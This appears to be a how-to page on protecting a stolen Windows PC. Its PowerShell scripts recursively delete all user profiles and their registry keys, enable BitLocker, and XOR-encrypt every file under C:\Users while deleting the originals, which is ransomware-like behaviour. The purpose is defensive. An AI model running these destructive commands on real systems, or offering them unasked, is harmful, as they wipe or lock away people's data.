Protecting a stolen Windows PC (remotely)

Deleting user data

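# Registry key that maps each profile SID to its folder (ProfileImagePath)
$profileList = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList"
$users = Get-ChildItem "C:\Users\" -Exclude "Public"
ForEach ($user in $users) {
    # ProfileList subkeys are named by SID, not by folder name, so match on ProfileImagePath
    $keys = Get-ChildItem $profileList | Where-Object { $_.GetValue("ProfileImagePath") -eq $user.FullName }
    ForEach ($key in $keys) {
        Remove-Item -Path $key.PSPath -Recurse -Force      # delete the profile's registry key
    }
    Remove-Item -Path $user.FullName -Recurse -Force       # delete the profile's files and folders
}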

Enabling BitLocker

TPM required.

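$driveLetter = "C:"                       # system drive, written as in the BitLocker cmdlet documentation
$bitlockerPassword = "VotreMotDePasse"    # placeholder ("YourPassword"): replace before running
# Enable-BitLocker expects the password as a SecureString
$securePassword = ConvertTo-SecureString $bitlockerPassword -AsPlainText -Force
# Encrypt the volume with AES-256 and add a password protector
Enable-BitLocker -MountPoint $driveLetter -EncryptionMethod Aes256 -PasswordProtector -Password $securePassword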

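This script enables BitLocker on the system drive (assuming it is eligible for encryption) with AES-256 and a password protector built from the specified password. A TPM and PIN protector and a backup of the BitLocker recovery key to a file on the system drive are not set up by the command shown; each needs its own protector parameter or an additional step.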

Note that this script assumes that you have administrative access to the stolen computer and that you have the necessary permissions to enable BitLocker. Additionally, enabling BitLocker remotely may require additional network or system configuration, depending on your specific environment. Be sure to consult your organization’s security policies and procedures before attempting to enable BitLocker remotely.

Manual encryption of user data

XOR

XOR Encryptor PowerShell
$folderPath = "C:\Users"
$password = "VotreMotDePasse"    # placeholder ("YourPassword"): replace before running
# Derive a 32-byte key from the password with SHA-256
$hashedPassword = [System.Security.Cryptography.SHA256]::Create().ComputeHash([System.Text.Encoding]::UTF8.GetBytes($password))
$fileList = Get-ChildItem -Path $folderPath -Recurse
# XOR every byte of the file with the repeating key and write the result to <file>.enc
function Encrypt-File {
    param(
        [string]$filePath,
        [byte[]]$key
    )
    Write-Host "$($filePath)"
    $fileData = [System.IO.File]::ReadAllBytes($filePath)
    for ($i = 0; $i -lt $fileData.Length; $i++) {
        $fileData[$i] = $fileData[$i] -bxor $key[$i % $key.Length]
    }
    [System.IO.File]::WriteAllBytes("$filePath.enc", $fileData)
}
# Encrypt each file (directories are skipped), then delete the original
foreach ($file in $fileList) {
    if ($file -is [System.IO.FileInfo]) {
        Encrypt-File -filePath $file.FullName -key $hashedPassword
        Remove-Item -Path $file.FullName
    }
}
Write-Host "Chiffrement et suppression des anciens fichiers terminés."
XOR Decryptor PowerShell
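$folderPath = "C:\Users"
$password = "VotreMotDePasse"    # must be the password used by the encryptor
# Derive the same 32-byte key from the password with SHA-256
$hashedPassword = [System.Security.Cryptography.SHA256]::Create().ComputeHash([System.Text.Encoding]::UTF8.GetBytes($password))
$fileList = Get-ChildItem -Path $folderPath -Filter "*.enc" -Recurse
# XOR is its own inverse: applying the same key again restores the original bytes
function Decrypt-File {
    param(
        [string]$filePath,
        [byte[]]$key
    )
    Write-Host "Déchiffrement du fichier : $($filePath)"
    $fileData = [System.IO.File]::ReadAllBytes($filePath)
    for ($i = 0; $i -lt $fileData.Length; $i++) {
        $fileData[$i] = $fileData[$i] -bxor $key[$i % $key.Length]
    }
    # Strip only the trailing ".enc"; String.Replace would also remove ".enc" elsewhere in the path
    [System.IO.File]::WriteAllBytes(($filePath -replace '\.enc$', ''), $fileData)
}
# Decrypt each .enc file, then delete the encrypted copy
foreach ($file in $fileList) {
    # -Filter can match longer extensions, so check the exact extension before touching the file
    if ($file -is [System.IO.FileInfo] -and $file.Extension -eq ".enc") {
        Decrypt-File -filePath $file.FullName -key $hashedPassword
        Remove-Item -Path $file.FullName
    }
}
Write-Host "Déchiffrement terminé."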
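
Added example (not part of the original page): the XOR scripts above apply one 32-byte SHA-256 key, repeated, to every file, so the key is exposed wherever 32 consecutive plaintext bytes are predictable. The snippet shows that property on constructed in-memory data only; Invoke-Xor is a hypothetical helper that mirrors the Encrypt-File loop, and the sample strings are made up.

```powershell
# Added example: constructed in-memory data only; no file is read or written.
$password = "VotreMotDePasse"    # same placeholder as the scripts above
$sha = [System.Security.Cryptography.SHA256]::Create()
$key = $sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($password))    # 32-byte key, as in Encrypt-File

# Hypothetical helper: the Encrypt-File XOR loop applied to a byte array
function Invoke-Xor {
    param([byte[]]$Data, [byte[]]$Key)
    $out = New-Object byte[] $Data.Length
    for ($i = 0; $i -lt $Data.Length; $i++) {
        $out[$i] = $Data[$i] -bxor $Key[$i % $Key.Length]
    }
    return ,$out    # leading comma keeps the array from being unrolled
}

# Constructed sample file: a predictable opening followed by private content
$ascii  = [System.Text.Encoding]::ASCII
$known  = $ascii.GetBytes("Constructed header that every file of this kind starts with.")
$secret = $ascii.GetBytes(" Private notes: constructed sample content.")
$cipher = Invoke-Xor -Data ([byte[]]($known + $secret)) -Key $key

# plaintext XOR ciphertext = key, so 32 known bytes yield the whole repeating key
$recovered = Invoke-Xor -Data ([byte[]]($cipher[0..31])) -Key ([byte[]]($known[0..31]))
$keyMatches = [System.BitConverter]::ToString($recovered) -eq [System.BitConverter]::ToString($key)

# The recovered key restores the rest of the data without the password
$plain = $ascii.GetString((Invoke-Xor -Data $cipher -Key $recovered))
Write-Host "Key recovered from known bytes: $keyMatches"
Write-Host "Recovered content: $plain"
```

The XOR pass therefore works as obfuscation rather than confidentiality; of the steps on this page, the AES-256 BitLocker volume encryption is the one that provides it.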